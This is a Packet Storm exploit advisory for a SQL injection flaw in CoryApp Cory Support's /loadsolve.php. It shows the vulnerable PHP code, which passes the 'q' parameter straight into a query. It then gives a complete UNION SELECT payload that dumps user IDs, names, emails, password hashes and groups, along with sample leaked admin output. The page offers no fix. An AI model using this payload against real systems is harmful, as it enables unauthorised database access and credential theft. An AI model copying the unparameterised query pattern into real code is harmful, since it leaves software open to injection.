exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

CoryApp Cory Support SQL Injection

CoryApp Cory Support SQL Injection
Posted Mar 2, 2014
Authored by Slotleet

CoryApp Cory Support suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 658e821835139ccb78601a7ff35365dc9bd8763a2c386ad070ffbdff9b4c1867

CoryApp Cory Support SQL Injection

Change Mirror Download
# Exploit Title: CoryApp (Cory Support) MySQL Injection Vulnerabilities
# Google Dork: None
# Date: 02,March 02,2014
# Exploit Author: Slotleet
# Vendor Homepage: http://coryapp.com
# Software Link:
http://coryapp.com/download/?file=6108cd096d1c940dcff7c300ba966934 (u
have to register)
# Version: None
# Tested on: Win,Linux
# Greet'z : I-HMX <3
==========================
Vulnerability Description
==========================

The Cory Support is prone to Get MySQL Injection Vulnerabilities

==========================
PoC-Exploit
==========================

// GET MySQL Injection with "q" Parameter in /loadsolve.php

1 : <?php
2 : require_once('includes/config.php');
3 : require_once('includes/database.php');
4 : $sql = "select Solutions, ProblemID from
".$table_prefix."problemsolutions where ProblemID = '".$_GET['q']."'
limit 3";
5 : $qry = mysql_query($sql);
6 : if(mysql_num_rows($qry)>0){
7 : while($rows = mysql_fetch_array($qry)){
8 : echo '<img src="'.$base_url.'imgs/re.gif"
style="margin-left:3%"/>'.stripslashes($rows['Solutions']).'<br>';
9 : }
10 : echo '<p style="margin:0px; padding:0px; margin-left:3%">. .
.</p><a href="'.$base_url.'view.php?id='.$_GET['q'].'"><small><i>View
more</i></small></a>';
11 : }
12 : else echo '<i>Not have answer !</i>';
13 : mysql_close();
14 : ?>

In line 3 coder failed to secure the "q" Parameter Against (MySQL
Injection) using q parameter

(1) Under "q" set your GET Parameter q to "999999.9' union all select
(select concat(0x27%2C0x7e%2Cunhex(Hex(cast(sp_users.UserID as
char)))%2C0x5e%2Cunhex(Hex(cast(sp_users.Name as
char)))%2C0x5e%2Cunhex(Hex(cast(sp_users.Email as
char)))%2C0x5e%2Cunhex(Hex(cast(sp_users.Password as
char)))%2C0x5e%2Cunhex(Hex(cast(sp_users.UserGroup as
char)))%2C0x27%2C0x7e) from `DATABASE NAME HERE`.sp_users limit 5%2C1)
%2C0x31303235343830303536 and 'x'%3D'x" (without quotation marks)



The "q" GET MySQL injection will be executed for the MySQL Server From
browser (You'll see the info like
'~6^admin^slotleet@gmail.com^e10adc3949ba59abbe56e057f20f883e^3'~)

==========================
Solution
==========================

Not Available.

==========================
Credits
==========================

Vulnerabilities found and advisory written by Slotleet.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close